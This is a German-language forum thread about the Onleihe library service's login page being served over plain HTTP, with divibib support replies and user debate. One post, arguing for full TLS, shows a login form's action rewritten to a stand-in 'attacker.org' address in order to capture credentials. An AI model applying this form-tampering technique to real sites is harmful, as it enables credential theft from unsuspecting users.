Onleihe HTTPS

onleihe:hilfe
Aktuelle Meldungen finden Sie stets auf der :hilfeseite für die Onleihe.

  • <form action="http

    s

    ://www.voebb.de/w3/divibib/access.rdr" method="post" accept-charset="ISO-8859-1">


    Nur wenn die Formularseite bereits SSL-Verschlüsselt ausgeliefert wird, werden alle folgenden Aktionen auch so verarbeitet.


    Wer lesen kann, ist im Vorteil.

    • Offizieller Beitrag

    Hallo fschoene,


    Nochmal:
    Die Daten des Benutzers werden bei der Authentifizierung unverschlüsselt - also im Klartext - über das Internet an den Server der Onleihe übertragen. Erst dort wird dann eine verschlüsselte Verbindung zum LMS hergestellt.
    In der allgemeinen Datenschutzerklärung steht im Gegensatz dazu:


    Tatsächlich wird also keine unmittelbare, verschlüsselte Verbindung hergestellt.


    Das ist nicht korrekt, wie hier auch schon mehrfach erklärt wurde.


    Also, die Anmeldeseite wird unverschlüsselt an den Client des Nutzers geschickt. Korrekt. Ob wir diesen Weg ebenfalls verschlüsseln sollten, mag für den Moment unerheblich sein.
    Nun hat der Nutzer die Anmeldeseite vor sich und gibt seine Login-Daten ein.
    Dann klickt er absenden/anmelden ... jedenfalls gibt es einen "submit"-Befehl.


    Im Quellcode - den jeder aufrufen kann - kann man nach upa suchen und dort findet man wie oben erwähnt den Aufruf für das System, das unsere Anmeldungen regelt, und dieser läuft per HTTPS, also verschlüsselt.
    Das bedeutet, in dem Moment, wo die eingegebenen Anmeldedaten versendet werden ist es verschlüsselt.


    Danach findet die Kommunikation von unseren Servern mit denen der Bibliothek statt und sofern wir HTTPS seitens der Bibliothek nutzen können (nicht alle Bibliotheken schicken uns HTTPS-Zugänge zur Ihren Systemen) ist dies ebenfalls verschlüsselt.


    Systeme divibib (Anmeldemaske) >> Client = unverschlüsselt
    Client >> UPA (Anmeldedaten) = verschlüsselt
    UPA >> Bibliothek (Authentifikation) = verschlüsselt


    Ansonsten gelten die bereits getroffenen Aussagen.


    Freundliche Grüße
    divibib-Support

  • @divibib-support: Hallo, ich habe die Diskussion weiter mitverfolgt. Ich kann die Antwort nachvollziehen.
    Zurzeit werden wir in Offenburg oft angerufen, weshalb die Onleihe "nicht sicher" wäre. Der Verursacher ist der HTTPS-Wahn von manchen Browsern.
    Könnt Ihr bitte was dagegen machen, es ist ziemlich lästig.


    Schöne Grüße aus Offenburg

  • DiviBib könnte die Browseranbieter kontaktieren,


    Das wird definitiv nix bringen, da bin ich mir zu 100% sicher. So ein "Problem" stört die großen Anbieter herzlich wenig. Und wie du schon erkannt hast, kommt der HTTPS-Wahn von dort und dann wollen die auch keine Ausnahmen.


    sich dem HTTPS-Wahn ergeben und alles auf HTTPS umstellen,


    Wurde doch schon geschrieben, dass sie sich dazu Gedanken machen. Es wird aber keine schnelle Lösung hierfür geben.

  • wie DiviBib das Problem löst, dass ist deren Sache.


    Ja, nee, is klar.


    Liebe DiViBib: Der Weltfrieden ist immer noch nicht ausgebrochen. Wie ihr das Problem löst, ist eure Sache.


    :m

  • Die Vergleiche von Annanymous werden aber auch immer doofer. Die DiViBib hat mit dem Weltfrieden absolut nix zu tun - sie hat die HTTPS-Verschlüsselung aber in ihrer Hand und ist dafür verantwortlich.


    Ob ich für meinen Büchereizugang unbedingt einen sicheren Zugang benötige möchte ich gar nicht beurteilen. Aber für jemand der sonst immer die Anonymität hoch hält ist es schon seltsam dass die sichere Verschlüsselung keine Rolle spielt.

  • Hallo Alv,


    schön wäre es. Aber dass gebildete Menschen keine Kriege führen würde ich auch wünschen - ist aber nur ein Wunsch. Die meisten Kriege werden von den gebildeten Eliten angezettelt.

  • [...]Der Verursacher ist der HTTPS-Wahn von manchen Browsern [...]

    Spätestens an dieser Stelle kann ich nicht mehr folgen... wie äußert sich browserseitiger HTTPS-"Wahn"? Und wer genau ist "manche" Browser?
    Also mein Browser hat keinen Wahn, glaube ich...


    OT an die divibib:

    Für die Implementierung eines Weltfriedens schlage ich zwei Apps :thumbup: vor:
    1. Friedens-App: funktioniert auf jedem auch noch so alten Gerät, Anmeldung 24/7 möglich ...
    2. Unfriedens-App: Zugang und Streamen Glücksfall, gezieltes Einsetzen unerwarteter Fehler ... und bei jeder Fehlermeldung Weiterleitung auf Friedens-App. Natürlich mit HTTPS
    :D

    Einmal editiert, zuletzt von spitzefeder ()

  • Hallo spitzefeder,


    hier kann ich zur Aufklärung beitragen. Mein Browser (Firefox) hat auch keinen "Wahn", aber beim Einstieg sagt er, dass es eine unsichere Verbindung ist. Das kann man abstellen indem man die Sicherheitseinstellungen anpaßt. Das möchte ich aber nicht - bei der Bücherei ist mir das ziemlich egal aber im Online-Banking möchte ich doch gewarnt werden, wenn ich eine "unsichere" Verbindung verwende.

    • Offizieller Beitrag

    Guten Morgen zusammen,


    zu diesem Thema ist vorerst mal alles gesagt. Die Positionen sind bekannt, Sticheleien wie üblich nicht notwendig.


    => Die divibib ist dran, eine schnelle Umsetzung wird es nicht geben. Das hat technische und organisatorische Gründe.


    Den Thread schließe ich nicht, haltet euch aber bitte mit unnötigen Kommentaren zurück!


    Danke und freundliche Grüße
    divibib-Support

  • wie äußert sich browserseitiger HTTPS-"Wahn"? Und wer genau ist "manche" Browser?


    Der "Wahn" äußert sich eben darin, dass der Brwoser recht schnell die Fehlemeldung ausgibt, dass die Seite unsicher ist, wenn sie kein HTTPS hat. Und die Warnung kommt jetzt eben immer häufiger als früher. Die betroffenen Browser sind auf jeden Fall Chrome und Firefox. Wie es mit Edge und IE aussieht weiß ich nicht, aber die springe da (wenn noch nicht passiert) definitiv auch noch auf.

  • Es reicht eben nicht, wenn nur die Anmeldedaten verschlüsselt übertragen werden.


    Die Experten von OWASP (Open Web Application Security Project) schreiben unter https://www.owasp.org/index.ph…rong_Transport_Everywhere folgendes:


    Zitat

    The login page and all subsequent authenticated pages must be exclusively accessed over TLS. The initial login page, referred to as the "login landing page", must be served over TLS. Failure to utilize TLS for the login landing page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS for authenticated pages after the login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.


    Auf Deutsch:

    Zitat

    Die Login-Seite und alle darauffolgenden authentifizierten Seiten dürfen ausschliesslich über TLS (https) zugreifbar sein. Die initiale Login-Seite, auch "Login Landungsseite", muss über TLS (https) ausgeliefert werden. Wenn die Login Landungsseite nicht über https ausgeliefert wird, kann ein Angreifer die beim Login verwendete Adresse verändern, wodurch Username und Passwort zu einer beliebigen Seite umgeleitet werden können. [...]


    Anders gesagt: ein Angreifer kann die Seite, auf der ich meine Logindaten eingebe manipulieren. Er könnte zum Beispiel aus


    Code
    <form action="https://www.voebb.de/w3/divibib/access.rdr" method="post" accept-charset="ISO-8859-1">


    ein


    Code
    <form action="https://www.attacker.org/divibib" method="post" accept-charset="ISO-8859-1">


    machen, meine Eingabe aufzeichnen und die Daten im Hintergrund an die richtige Adresse weiterleiten.

  • Sagt mal ...


    ... geht ihr eigentlich inkognito in eine Buchhandlung?
    So richtig mit dunklem Trenchcoat und Hut auf, damit euch in der Buchhandlung ja keiner erkennt?


    Hallo, es geht doch nur ums Bücher ausleihen. Gebt eure Daten lieber nicht preis, wenn es etwas zu gewinnen gibt.